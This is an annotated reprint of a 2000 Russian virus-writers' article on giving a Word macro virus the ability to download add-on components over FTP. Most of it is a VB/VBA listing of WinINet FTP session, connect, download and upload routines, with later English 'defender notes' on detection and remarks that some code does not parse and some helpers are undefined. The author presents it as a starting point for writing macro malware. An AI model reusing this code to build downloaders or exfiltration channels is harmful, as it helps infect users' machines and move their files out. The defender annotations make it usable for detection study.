|
|
В этой статье я попробую рассказать о подкачке вирусом дополнений из интернета для макро
зверей...
Всего несколько метавирусов были выпущены на свет, вирумакеры не стали писать таких вирей из-за того,
что это довольно геморно. Я тоже не смог написать такой вирус на asm один, и я решил написать этот
вирус с маленьким составом. При написании такого вируса я подумал: а почему на асме и только для win32?
И, выпив пивка, я решил написать макровирус с подкачкой. Мне хотелось чего-нибудь оригинального, и я решил сделать
это через FTP. Писал я это, пока пиво не закончилось; тут описан маленький кусок алгоритма. Это просто первая
попытка написать вирус под w0rd с плагинами.
ULTRAS[MATRiX]
(c) 2000
Начало кода
~~~~~~~~~~~
Этот метод использует windoze api.
' WinINet import: FtpGetFile copies a file from the FTP server to a local path.
' GetFile below uses it to fetch the add-on ("plugin") component.
' Defender note: Declare statements that bind wininet.dll FTP exports inside an
' Office macro project are a strong static indicator for macro scanners.
Private Declare Function FtpGetFile Lib "wininet.dll" Alias "FtpGetFileA" _
(ByVal hftpSession As Long, _
ByVal lpszRemoteFile As String, _
ByVal lpszNewFile As String, _
ByVal fFailIfExists As Boolean, _
ByVal dwFlagsAndAttributes As Long, _
ByVal dwFlags As Long, _
ByVal dwContext As Long) _
As Boolean
' WinINet import: FtpPutFile sends a local file to the FTP server (upload).
' The original comment here repeated "download", which does not match this API.
Private Declare Function FtpPutFile Lib "wininet.dll" Alias "FtpPutFileA" _
(ByVal hftpSession As Long, _
ByVal lpszLocalFile As String, _
ByVal lpszRemoteFile As String, _
ByVal dwFlags As Long, _
ByVal dwContext As Long) _
As Boolean
' Directory helpers the author lists as optional; neither is called directly
' by the procedures shown in this listing.
Private Declare Function FtpSetCurrentDirectory Lib "wininet.dll" _
Alias "FtpSetCurrentDirectoryA" _
(ByVal hftpSession As Long, _
ByVal lpszDirectory As String) _
As Boolean
Private Declare Function FtpGetCurrentDirectory Lib "wininet.dll" _
Alias "FtpGetCurrentDirectoryA" _
(ByVal hftpSession As Long, _
ByVal lpszCurrentDirectory As String, _
lpdword As Long) _
As Boolean
' WinINet import: InternetOpen returns the root session handle; OpenSession
' below is the only caller in this listing.
Private Declare Function InternetOpen _
Lib "wininet.dll" _
Alias "InternetOpenA" _
(ByVal sAgent As String, _
ByVal lAccessType As Long, _
ByVal sProxyName As String, _
ByVal sProxyBypass As String, _
ByVal lFlags As Long) _
As Long
' WinINet constants: access types for InternetOpen, the "use the service default"
' port value, FTP transfer modes and the passive-mode flag.
' Of these, the procedures in this listing reference only
' INTERNET_OPEN_TYPE_DIRECT, INTERNET_OPEN_TYPE_PROXY,
' INTERNET_INVALID_PORT_NUMBER and INTERNET_FLAG_PASSIVE.
Private Const INTERNET_OPEN_TYPE_PRECONFIG As Long = 0
Private Const INTERNET_OPEN_TYPE_DIRECT As Long = 1
Private Const INTERNET_OPEN_TYPE_PROXY As Long = 3
Private Const INTERNET_INVALID_PORT_NUMBER As Long = 0
Private Const FTP_TRANSFER_TYPE_ASCII As Long = &H1
Private Const FTP_TRANSFER_TYPE_BINARY As Long = &H2
Private Const INTERNET_FLAG_PASSIVE As Long = &H8000000
' WinINet import: InternetConnect opens a service connection (FTP here) on top
' of a session handle, taking the server name, user name and password.
' Defender note: FTP carries these credentials in cleartext, so the server,
' account and file names are recoverable from a network capture.
Private Declare Function InternetConnect _
Lib "wininet.dll" _
Alias "InternetConnectA" _
(ByVal hInternetSession As Long, _
ByVal sServerName As String, _
ByVal nServerPort As Integer, _
ByVal sUsername As String, _
ByVal sPassword As String, _
ByVal lService As Long, _
ByVal lFlags As Long, _
ByVal lContext As Long) _
As Long
' WinINet error codes, expressed as offsets from INTERNET_ERROR_BASE (12000).
' None of the ERROR_* constants below is referenced by the procedures in this
' listing; failures are only recorded as the raw Err.LastDLLError value.
' The table as printed has no entries for base + 35 and base + 51.
Private Const INTERNET_ERROR_BASE = 12000
Private Const ERROR_INTERNET_OUT_OF_HANDLES As Long = (INTERNET_ERROR_BASE + 1)
Private Const ERROR_INTERNET_TIMEOUT As Long = (INTERNET_ERROR_BASE + 2)
Private Const ERROR_INTERNET_EXTENDED_ERROR As Long = (INTERNET_ERROR_BASE + 3)
Private Const ERROR_INTERNET_INTERNAL_ERROR As Long = (INTERNET_ERROR_BASE + 4)
Private Const ERROR_INTERNET_INVALID_URL As Long = (INTERNET_ERROR_BASE + 5)
Private Const ERROR_INTERNET_UNRECOGNIZED_SCHEME As Long = (INTERNET_ERROR_BASE + 6)
Private Const ERROR_INTERNET_NAME_NOT_RESOLVED As Long = (INTERNET_ERROR_BASE + 7)
Private Const ERROR_INTERNET_PROTOCOL_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 8)
Private Const ERROR_INTERNET_INVALID_OPTION As Long = (INTERNET_ERROR_BASE + 9)
Private Const ERROR_INTERNET_BAD_OPTION_LENGTH As Long = (INTERNET_ERROR_BASE + 10)
Private Const ERROR_INTERNET_OPTION_NOT_SETTABLE As Long = (INTERNET_ERROR_BASE + 11)
Private Const ERROR_INTERNET_SHUTDOWN As Long = (INTERNET_ERROR_BASE + 12)
Private Const ERROR_INTERNET_INCORRECT_USER_NAME As Long = (INTERNET_ERROR_BASE + 13)
Private Const ERROR_INTERNET_INCORRECT_PASSWORD As Long = (INTERNET_ERROR_BASE + 14)
Private Const ERROR_INTERNET_LOGIN_FAILURE As Long = (INTERNET_ERROR_BASE + 15)
Private Const ERROR_INTERNET_INVALID_OPERATION As Long = (INTERNET_ERROR_BASE + 16)
Private Const ERROR_INTERNET_OPERATION_CANCELLED As Long = (INTERNET_ERROR_BASE + 17)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_TYPE As Long = (INTERNET_ERROR_BASE + 18)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_STATE As Long = (INTERNET_ERROR_BASE + 19)
Private Const ERROR_INTERNET_NOT_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 20)
Private Const ERROR_INTERNET_REGISTRY_VALUE_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 21)
Private Const ERROR_INTERNET_BAD_REGISTRY_PARAMETER As Long = (INTERNET_ERROR_BASE + 22)
Private Const ERROR_INTERNET_NO_DIRECT_ACCESS As Long = (INTERNET_ERROR_BASE + 23)
Private Const ERROR_INTERNET_NO_CONTEXT As Long = (INTERNET_ERROR_BASE + 24)
Private Const ERROR_INTERNET_NO_CALLBACK As Long = (INTERNET_ERROR_BASE + 25)
Private Const ERROR_INTERNET_REQUEST_PENDING As Long = (INTERNET_ERROR_BASE + 26)
Private Const ERROR_INTERNET_INCORRECT_FORMAT As Long = (INTERNET_ERROR_BASE + 27)
Private Const ERROR_INTERNET_ITEM_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 28)
Private Const ERROR_INTERNET_CANNOT_CONNECT As Long = (INTERNET_ERROR_BASE + 29)
Private Const ERROR_INTERNET_CONNECTION_ABORTED As Long = (INTERNET_ERROR_BASE + 30)
Private Const ERROR_INTERNET_CONNECTION_RESET As Long = (INTERNET_ERROR_BASE + 31)
Private Const ERROR_INTERNET_FORCE_RETRY As Long = (INTERNET_ERROR_BASE + 32)
Private Const ERROR_INTERNET_INVALID_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 33)
Private Const ERROR_INTERNET_NEED_UI As Long = (INTERNET_ERROR_BASE + 34)
Private Const ERROR_INTERNET_HANDLE_EXISTS As Long = (INTERNET_ERROR_BASE + 36)
Private Const ERROR_INTERNET_SEC_CERT_DATE_INVALID As Long = (INTERNET_ERROR_BASE + 37)
Private Const ERROR_INTERNET_SEC_CERT_CN_INVALID As Long = (INTERNET_ERROR_BASE + 38)
Private Const ERROR_INTERNET_HTTP_TO_HTTPS_ON_REDIR As Long = (INTERNET_ERROR_BASE + 39)
Private Const ERROR_INTERNET_HTTPS_TO_HTTP_ON_REDIR As Long = (INTERNET_ERROR_BASE + 40)
Private Const ERROR_INTERNET_MIXED_SECURITY As Long = (INTERNET_ERROR_BASE + 41)
Private Const ERROR_INTERNET_CHG_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 42)
Private Const ERROR_INTERNET_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 43)
Private Const ERROR_INTERNET_CLIENT_AUTH_CERT_NEEDED As Long = (INTERNET_ERROR_BASE + 44)
Private Const ERROR_INTERNET_INVALID_CA As Long = (INTERNET_ERROR_BASE + 45)
Private Const ERROR_INTERNET_CLIENT_AUTH_NOT_SETUP As Long = (INTERNET_ERROR_BASE + 46)
Private Const ERROR_INTERNET_ASYNC_THREAD_FAILED As Long = (INTERNET_ERROR_BASE + 47)
Private Const ERROR_INTERNET_REDIRECT_SCHEME_CHANGE As Long = (INTERNET_ERROR_BASE + 48)
Private Const ERROR_INTERNET_DIALOG_PENDING As Long = (INTERNET_ERROR_BASE + 49)
Private Const ERROR_INTERNET_RETRY_DIALOG As Long = (INTERNET_ERROR_BASE + 50)
Private Const ERROR_INTERNET_HTTPS_HTTP_SUBMIT_REDIR As Long = (INTERNET_ERROR_BASE + 52)
Private Const ERROR_INTERNET_INSERT_CDROM As Long = (INTERNET_ERROR_BASE + 53)
' FTP API Errors
Private Const ERROR_FTP_TRANSFER_IN_PROGRESS As Long = (INTERNET_ERROR_BASE + 110)
Private Const ERROR_FTP_DROPPED As Long = (INTERNET_ERROR_BASE + 111)
Private Const ERROR_FTP_NO_PASSIVE_MODE As Long = (INTERNET_ERROR_BASE + 112)
' Number of the TCP/IP port on the server to connect to.
' Defender note: an Office process opening an outbound FTP control connection
' (21/tcp) is unusual on a workstation and is a high-signal event for egress
' filtering and network monitoring.
Private Const INTERNET_DEFAULT_FTP_PORT As Long = 21
Private Const INTERNET_DEFAULT_GOPHER_PORT As Long = 70
Private Const INTERNET_DEFAULT_HTTP_PORT As Long = 80
Private Const INTERNET_DEFAULT_HTTPS_PORT As Long = 443
Private Const INTERNET_DEFAULT_SOCKS_PORT As Long = 1080
' Option identifiers (timeouts and credentials); not referenced by the
' procedures in this listing.
Private Const INTERNET_OPTION_CONNECT_TIMEOUT As Long = 2
Private Const INTERNET_OPTION_RECEIVE_TIMEOUT As Long = 6
Private Const INTERNET_OPTION_SEND_TIMEOUT As Long = 5
Private Const INTERNET_OPTION_USERNAME As Long = 28
Private Const INTERNET_OPTION_PASSWORD As Long = 29
Private Const INTERNET_OPTION_PROXY_USERNAME As Long = 43
Private Const INTERNET_OPTION_PROXY_PASSWORD As Long = 44
' Service selectors for InternetConnect; Connect passes INTERNET_SERVICE_FTP.
Private Const INTERNET_SERVICE_FTP As Long = 1
Private Const INTERNET_SERVICE_GOPHER As Long = 2
Private Const INTERNET_SERVICE_HTTP As Long = 3
' Request flags; GetFile ORs INTERNET_FLAG_RELOAD into its transfer flags.
Private Const INTERNET_FLAG_RELOAD As Long = &H80000000
Private Const INTERNET_FLAG_KEEP_CONNECTION As Long = &H400000
Private Const INTERNET_FLAG_MULTIPART As Long = &H200000
' Access masks for FtpOpenFile; not used by the procedures in this listing.
Private Const GENERIC_READ As Long = &H80000000
Private Const GENERIC_WRITE As Long = &H40000000
' WinINet import: FtpOpenFile opens a remote file for read or write access.
' Declared only; no procedure in this listing calls it.
Private Declare Function FtpOpenFile _
Lib "wininet.dll" _
Alias "FtpOpenFileA" _
(ByVal hftpSession As Long, _
ByVal sFileName As String, _
ByVal lAccess As Long, _
ByVal lFlags As Long, _
ByVal lContext As Long) _
As Long
' WinINet import: FtpDeleteFile removes a file on the server.
' Declared only; no procedure in this listing calls it.
Private Declare Function FtpDeleteFile _
Lib "wininet.dll" _
Alias "FtpDeleteFileA" _
(ByVal hftpSession As Long, _
ByVal lpszFileName As String) _
As Boolean
' WinINet import: InternetCloseHandle releases a handle returned by the
' functions above; Disconnect uses it on the connection handle.
Private Declare Function _
InternetCloseHandle _
Lib "wininet.dll" _
(ByVal hInet As Long) _
As Integer
' Private variables to support class properties
' u_strProxyString and u_lngTransferType are read by the procedures below but
' never assigned anywhere in this listing, so they keep their defaults ("" and 0)
' unless code outside the listing sets them.
' Defender note: server name, user name and password are held as plain strings,
' so they can be recovered from a captured sample or from process memory.
Private u_strProxyString As String
Private u_lngSessionHandle As Long
Private u_lngConnectionHandle As Long
Private u_fSessionActive As Boolean
Private u_strUserName As String
Private u_strPassword As String
Private u_strServer As String
Private u_lngTransferType As Long
Private u_strLastDLLError As String
' Connect to the FTP server.
' NOTE(review): as printed, this procedure has three End If lines with no
' matching If, so it does not parse; the code is left exactly as published.
Public Function Connect() As Boolean
' Comments : Connects to the FTP server named by txtServer using
'            txtUserName / txtPassword (none of the three is defined in this
'            listing; presumably form fields or constants, confirm in the sample).
' Returns : True on success, False otherwise
Dim fConnected As Boolean
On Error GoTo errorz
' Reset all connection state before the attempt.
u_fSessionActive = False
u_lngSessionHandle = 0
u_lngConnectionHandle = 0
u_strServer = txtServer ' server address
u_strUserName = txtUserName ' user name
u_strPassword = txtPassword ' password
' INTERNET_INVALID_PORT_NUMBER (0) asks WinINet for the default port of the
' selected service; INTERNET_FLAG_PASSIVE requests passive-mode FTP.
u_lngConnectionHandle = InternetConnect(u_lngSessionHandle, u_strServer, _
INTERNET_INVALID_PORT_NUMBER, u_strUserName, u_strPassword, _
INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0)
GetDLLError
' Check what came back: a non-zero handle means the connection is open.
If u_lngConnectionHandle <> 0 Then
' Mark the session as active.
fConnected = True
u_fSessionActive = True
Else
fConnected = False
End If
End If
End If
End If
_ret:
Connect = fConnected
Exit Function
errorz:
' Any runtime error only shows a message box with the text "Ошибка" and returns.
MsgBox "Ошибка"
resume _ret
End Function
' Disconnect from the FTP server.
' Closes only the connection handle; u_lngSessionHandle is not touched here.
Public Sub Disconnect()
On Error GoTo errorz
' Disconnect only if a connection handle is currently held.
If u_lngConnectionHandle <> 0 Then
ClearDLLError
' Close the connection handle.
InternetCloseHandle u_lngConnectionHandle
' Record the last DLL error code.
GetDLLError
' Reset the connection handle.
u_lngConnectionHandle = 0
' Clear the "session active" flag.
u_fSessionActive = False
End If
_ret:
Exit Sub
errorz:
' Any runtime error only shows a message box with the text "Ошибка" and returns.
MsgBox "Ошибка"
Resume _ret
End Sub
Private Sub ClearDLLError()
    ' Forget the error text recorded for the previous WinINet call.
    Let u_strLastDLLError = ""
End Sub
' Stores Err.LastDLLError (the error code left by the most recent DLL call)
' in u_strLastDLLError; the numeric code is converted to a String on assignment.
Private Sub GetDLLError()
On Error GoTo errorz
u_strLastDLLError = Err.LastDLLError
_ret:
Exit Sub
errorz:
' Any runtime error only shows a message box with the text "Ошибка" and returns.
MsgBox "Ошибка"
Resume _ret
End Sub
Public Function OpenSession() As Boolean
' Comments : Opens a WinINet session (the root handle for later FTP calls).
'            Uses a direct connection when u_strProxyString is empty, otherwise
'            the proxy named by u_strProxyString.
'            mcstrUserAgent is not defined in this listing.
' Returns : True if the session opened successfully, False otherwise
Dim fOpened As Boolean
On Error GoTo errorz
' Start from the "not opened" state.
fOpened = False
ClearDLLError
If u_strProxyString = "" Then
u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_DIRECT, _
vbNullString, vbNullString, 0)
Else
u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_PROXY, _
u_strProxyString, vbNullString, 0)
End If
GetDLLError
' A non-zero handle means InternetOpen succeeded.
fOpened = (u_lngSessionHandle <> 0)
_ret:
OpenSession = fOpened
Exit Function
errorz:
' Any runtime error only shows a message box with the text "Ошибка" and returns.
MsgBox "Ошибка"
Resume _ret
End Function
' File download (the article's "download plugin" step).
' Defender note: the file written to strLocalFile is the on-disk artifact of
' this step; a file created by an Office process right after outbound FTP
' traffic is worth alerting on, and restricting Win32 API calls from Office
' macros removes the Declare-based path this code depends on.
Public Function GetFile( _
strRemoteFile As String, _
strLocalFile As String) _
As Boolean
' Comments : Downloads one file from the connected FTP server.
' Parameters: strRemoteFile - path and name of the file on the FTP server
' strLocalFile - path and name of the file to write on the client
' Returns : True on success, False otherwise (including when no session is
'           active or either name is empty)
' GetPathFromFTPPath, GetNameFromFTPPath, RemoteChDir and FILE_ATTRIBUTE_NORMAL
' are not defined in this listing.
Dim fRetval As Boolean
Dim strFileOnRemote As String
Dim strDirOnRemote As String
On Error GoTo errorz
' Proceed only if an FTP session is active.
If u_fSessionActive Then
' Both file names must be non-empty.
If strRemoteFile <> "" And strLocalFile <> "" Then
' Split the remote path into directory and file name.
strDirOnRemote = GetPathFromFTPPath(strRemoteFile)
strFileOnRemote = GetNameFromFTPPath(strRemoteFile)
' Change to that directory on the remote server.
RemoteChDir strDirOnRemote
ClearDLLError
' Transfer the file; fFailIfExists is False, so an existing local file with
' the same name is overwritten.
fRetval = FtpGetFile(u_lngConnectionHandle, strFileOnRemote, _
strLocalFile, False, FILE_ATTRIBUTE_NORMAL, _
INTERNET_FLAG_RELOAD Or u_lngTransferType, 0)
GetDLLError
End If
End If
_ret:
GetFile = fRetval
Exit Function
errorz:
' Any runtime error only shows a message box with the text "Ошибка" and returns.
MsgBox "Ошибка"
Resume _ret
End Function
' File upload.
' Defender note: the same FTP channel can move local files off the host, so
' treat it as an exfiltration path as well as a download path.
Public Function PutFile( _
strLocalFile As String, _
strRemoteFile As String) _
As Boolean
' Comments : Uploads one local file to the connected FTP server.
' Parameters: strLocalFile - path and name of the local file to send
' strRemoteFile - path and name to store the file under on the FTP server
' Returns : True on success, False otherwise (including when no session is
'           active or either name is empty)
' RemoteChDir is not defined in this listing.
Dim fRetval As Boolean
Dim strFileOnRemote As String
Dim strDirOnRemote As String
Dim strFileOnLocal As String
Dim strTmp As String
On Error GoTo errorz
' Proceed only if an FTP session is active.
If u_fSessionActive Then
' Both file names must be non-empty.
If strLocalFile <> "" And strRemoteFile <> "" Then
' Parse file names
strTmp = strRemoteFile
' Drops the first Len(u_strServer) characters of the remote name;
' presumably strRemoteFile is expected to start with the server name (confirm).
strDirOnRemote = Right(strTmp, Len(strTmp) - Len(u_strServer))
strFileOnRemote = strRemoteFile
strFileOnLocal = strLocalFile
' Fall back to the root directory when nothing is left.
If (strDirOnRemote = "") Then
strDirOnRemote = "/"
End If
' Change to the target directory on the FTP server.
RemoteChDir strDirOnRemote
ClearDLLError
' Send the file to the FTP server.
fRetval = FtpPutFile(u_lngConnectionHandle, strFileOnLocal, _
strFileOnRemote, u_lngTransferType, 0)
' Record the last DLL error code.
GetDLLError
End If
End If
_ret:
PutFile = fRetval
Exit Function
errorz:
' Any runtime error only shows a message box with the text "Ошибка" and returns.
MsgBox "Ошибка"
Resume _ret
End Function
Ну вот и все, правда, может, я параметры некоторые не написал, влом мне проверять, пиво закончилось..
Некоторые опции я не описал, типа FtpSetCurrentDirectory, там и так все ясно, короче, идея есть, немного кода есть,
хватит, чтобы что-нибудь написать.... Некоторые параметры придется изменить, так как писал я не в ворде, а в VB 6.0.
Могут быть глюки, они и у меня были, потому что я не все до конца отладил, но все-таки это работало.
Just do it...
L0rd Ultra
(с) 2000
|
|